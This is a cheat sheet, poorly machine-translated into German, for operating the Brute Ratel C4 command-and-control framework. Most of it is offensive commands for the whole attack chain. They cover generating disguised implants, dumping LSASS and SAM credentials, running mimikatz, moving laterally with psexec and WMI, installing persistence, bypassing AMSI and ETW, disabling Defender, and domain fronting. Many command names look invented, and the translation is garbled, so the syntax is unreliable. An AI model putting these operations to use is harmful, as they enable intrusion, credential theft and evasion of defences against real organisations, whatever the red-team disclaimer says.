Brute Ratel C4 Framework Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Brute Ratel C4 (BRc4) ist ein kommerzielles kundenspezifisches Kommando und Control (C2)-Framework, das für rote Teamoperationen und adversäre Simulationen konzipiert ist. Es bietet erweiterte Evasions-Funktionen, ausgeklügelte Funktionen der Nachbenutzung und professionelle Betriebssicherheit.

ZEIT Warning: Dies ist ein kommerzielles Tool, das eine gültige Lizenz benötigt. Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Lizenzaktivierung

```bash

Activate license (requires valid license key)

./brc4 --activate

Verify license status

./brc4 --license-info

Update license

./brc4 --update-license ```_

Server Setup

```bash

Start BRc4 server

./brc4 --server

Start with custom configuration

./brc4 --server --config /path/to/config.json

Start with specific interface

./brc4 --server --interface 0.0.0.0 --port 443 ```_

Client-Verbindung

```bash

Connect to server

./brc4 --client --server 192.168.1.100:443

Connect with authentication

./brc4 --client --server 192.168.1.100:443 --auth-token ```_

Befehlsnummer

Serververwaltung

Command	Description
help	Display help menu
version	Show version information
listeners	List active listeners
badgers	List connected badgers (agents)
operators	List connected operators
exit	Exit BRc4 server

Hörer Management

Command	Description
listener http	Create HTTP listener
listener https	Create HTTPS listener
listener dns	Create DNS listener
listener tcp	Create TCP listener
listener smb	Create SMB listener
listener stop <id>	Stop listener

Badger (Agent) Management

Command	Description
badger <id>	Interact with badger
badger kill <id>	Kill badger
badger sleep <time>	Set sleep interval
badger jitter <percentage>	Set jitter percentage
badger proxy <proxy>	Set proxy for badger

Hörer Konfiguration

HTTP/HTTPS Hörer

```bash

Create HTTPS listener

listener https set host 0.0.0.0 set port 443 set cert /path/to/cert.pem set key /path/to/key.pem set malleable /path/to/profile.profile start

Create HTTP listener with domain fronting

listener http set host 0.0.0.0 set port 80 set front-domain cdn.example.com set host-header legitimate-site.com start ```_

DNS Listener

```bash

Create DNS listener

listener dns set domain example.com set nameserver ns1.example.com set port 53 start ```_

BMB Hörer

```bash

Create SMB listener

listener smb set pipename msagent_pipe set host 0.0.0.0 set port 445 start ```_

TCP Hörer

```bash

Create TCP listener

listener tcp set host 0.0.0.0 set port 4444 set bind true start ```_

Die erste Generation

Windows Badgers

```bash

Generate Windows executable

generate windows exe set listener https-443 set arch x64 set format exe set output windows_badger.exe generate

Generate Windows DLL

generate windows dll set listener https-443 set arch x64 set format dll set output windows_badger.dll generate

Generate Windows service

generate windows service set listener https-443 set arch x64 set service-name "WindowsUpdate" set output windows_service.exe generate ```_

Linux Badgers

```bash

Generate Linux ELF

generate linux elf set listener https-443 set arch x64 set format elf set output linux_badger generate

Generate Linux shared library

generate linux so set listener https-443 set arch x64 set format so set output linux_badger.so generate ```_

macOS Badgers

```bash

Generate macOS binary

generate macos macho set listener https-443 set arch x64 set format macho set output macos_badger generate

Generate macOS application

generate macos app set listener https-443 set arch x64 set app-name "Updater" set output macos_app.app generate ```_

Post-Exploitationsbefehle

Systeminformationen

```bash

Get system information

sysinfo

Get current user

whoami

Get privileges

getprivs

Get environment variables

env

Get network interfaces

ifconfig ```_

Dateioperationen

```bash

List directory

ls /path/to/directory

Change directory

cd /path/to/directory

Download file

download /remote/path/file.txt

Upload file

upload /local/path/file.txt /remote/path/

Execute file

execute /path/to/executable

Delete file

rm /path/to/file ```_

Prozessmanagement

```bash

List processes

ps

Kill process

kill

Migrate to process

migrate

Inject into process

inject

Create process

spawn ```_

Netzwerkaktivitäten

```bash

Network connections

netstat

ARP table

arp

Routing table

route

Port scan

portscan 192.168.1.0/24 80,443,3389

Ping sweep

ping 192.168.1.0/24 ```_

Erweiterte Funktionen

Malleable C2 Profile

```bash

Load malleable profile

set malleable /path/to/profile.profile

Custom HTTP profile

http-get \\{ set uri "/api/v1/status"; client \\{ header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; header "Accept" "application/json"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_

Verfahrensinjektionstechniken

```bash

Classic DLL injection

inject-dll /path/to/dll.dll

Process hollowing

hollow

Reflective DLL loading

reflective-dll /path/to/dll.dll

Manual DLL mapping

map-dll /path/to/dll.dll

Thread hijacking

hijack-thread ```_

Credential Harvesting

```bash

Dump LSASS

lsass-dump

Mimikatz integration

mimikatz sekurlsa::logonpasswords

SAM dump

sam-dump

LSA secrets

lsa-secrets

Cached credentials

cache-dump

Browser credentials

browser-creds ```_

Spätere Bewegung

```bash

WMI execution

wmi-exec 192.168.1.10 "whoami"

PSExec

psexec 192.168.1.10 "whoami"

SMB execution

smb-exec 192.168.1.10 "whoami"

DCOM execution

dcom-exec 192.168.1.10 "whoami"

WinRM execution

winrm-exec 192.168.1.10 "whoami" ```_

Persistenzmechanismen

```bash

Registry persistence

persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

Scheduled task

persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

Service persistence

persist-service "UpdateService" "C:\temp\badger.exe"

WMI persistence

persist-wmi "ProcessStart" "C:\temp\badger.exe"

Startup folder

persist-startup "C:\temp\badger.exe" ```_

Evasion Techniken

Antianalyse

```bash

VM detection

vm-detect

Sandbox evasion

sandbox-evasion

Debugger detection

debugger-detect

Sleep evasion

sleep-evasion 300

User interaction check

user-interaction ```_

AMSI/ETW Bypass

```bash

AMSI bypass

amsi-bypass

ETW bypass

etw-bypass

Disable Windows Defender

disable-defender

Unhook DLLs

unhook-dlls

Patch AMSI

patch-amsi ```_

Verkehrsobfukation

```bash

Domain fronting

set front-domain cdn.cloudflare.com set host-header legitimate-site.com

Custom User-Agent

set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Custom headers

set headers "X-Forwarded-For: 192.168.1.100"

Proxy chains

set proxy-chain "http://proxy1:8080,socks5://proxy2:1080" ```_

Belastbarkeit

```bash

Encrypt payload

encrypt-payload aes256

Obfuscate strings

obfuscate-strings

Pack executable

pack-exe upx

Sign executable

sign-exe /path/to/cert.pfx

Polymorphic generation

polymorphic-gen ```_

Operationelle Sicherheit

Kommunikationssicherheit

```bash

Use encrypted channels

set encryption aes256

Certificate pinning

set cert-pinning true

Custom TLS configuration

set tls-version 1.3 set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

Jitter configuration

set jitter 20 set jitter-type random ```_

Infrastrukturmanagement

```bash

Redirector setup

set redirector nginx set upstream-server 192.168.1.100:443

Load balancing

set load-balancer round-robin set backend-servers "192.168.1.100,192.168.1.101"

Failover configuration

set failover-servers "backup1.com,backup2.com" ```_

Protokollierung und Überwachung

```bash

Enable detailed logging

set log-level debug set log-file /var/log/brc4.log

Operator tracking

set operator-logging true

Command auditing

set command-audit true

Session recording

set session-recording true ```_

Team Operations

Multi-Operator Unterstützung

```bash

Add operator

operator add username password

Set operator permissions

operator permissions username read,write,execute

Operator sessions

operator sessions

Kick operator

operator kick username ```_

Funktionen der Zusammenarbeit

```bash

Share badger session

share-session

Session notes

note-add "Important finding" note-list note-delete

Team chat

chat "Message to team" chat-history ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Test listener

test-listener

Check connectivity

test-connectivity

Verify certificates

verify-cert /path/to/cert.pem

Debug mode

set debug true ```_

Schlechtere Probleme

```bash

Badger health check

health-check

Reset badger

reset-badger

Badger diagnostics

diagnostics

Force reconnect

reconnect ```_

Leistungsoptimierung

```bash

Optimize sleep intervals

set sleep-optimization true

Bandwidth throttling

set bandwidth-limit 1024

Connection pooling

set connection-pooling true

Compression

set compression gzip ```_

Konfiguration

Serverkonfiguration

json \\\\{ "server": \\\\{ "host": "0.0.0.0", "port": 443, "ssl": true, "cert": "/path/to/cert.pem", "key": "/path/to/key.pem" \\\\}, "database": \\\\{ "type": "sqlite", "path": "/opt/brc4/database.db" \\\\}, "logging": \\\\{ "level": "info", "file": "/var/log/brc4.log" \\\\} \\\\}_

Profil anzeigen

```c

Custom malleable profile

set sample_name "Custom Profile"; set sleeptime "30000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get \\{ set uri "/api/status"; client \\{ header "Accept" "application/json"; header "Accept-Language" "en-US,en;q=0.9"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_

Ressourcen

• [Brute Ratel C4 Offizielle Website](LINK_4__
• BRc4 Dokumentation
• [Red Team Operations Guide](LINK_4_
• Malleable C2 Profiles

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Brute Ratel C4. Dies ist ein kommerzielles Werkzeug, das eine ordnungsgemäße Lizenzierung erfordert. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *